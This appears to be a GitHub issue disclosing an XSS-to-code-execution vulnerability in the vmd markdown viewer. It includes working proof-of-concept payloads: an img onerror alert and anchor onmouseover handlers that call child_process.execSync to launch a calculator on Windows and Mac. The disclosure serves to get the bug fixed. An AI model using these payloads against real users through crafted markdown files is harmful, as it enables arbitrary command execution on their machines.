Open notaisy opened 3 years ago
Hello, notaisy, and the other friends of this project.
Yeah, buddy, I've decided to investigate this case, and yeah, there is have a big problem, only for a stupid example, if someone malicious guy sends md
file with malicious content, and for example, the user is a real user ;) and don't know what actually is going on, the game is over for him.
https://streamable.com/oykc86 https://streamable.com/ngx2xm https://streamable.com/j7e13y
BR
Hi, I'd like to report a security vulnerability in lastest release :
Description: Cross-site scripting (XSS) vulnerability(also execute constructed malicious code) Date: 2021.05.17 Version: v1.26.2~v1.34.0 Tested on: Windows10 & Mac
POC
The program does not properly handle the content of the code, causing the program to have a cross-site scripting vulnerability, which can also execute constructed malicious code
<img src=1 onerror=alert(/xss/)>
XSS
the file content code :
<img src=1 onerror=alert(/xss/)>
Execute malicious code
the file content code :
<a onmouseover="require('child_process').execSync('calc.exe')">POC Link</a>
use vmd.exe open poc.md file to execute malicious code with xss vulnerability:
when vmd.exe open the poc.md file , the poc code parsed in vmd.exe
div class="markdown-body" </div>
, so it executed:Use the Poc
<a onmouseover="require('child_process').execSync('open -na Calculator')">POC Link</a>
on Mac:How to fix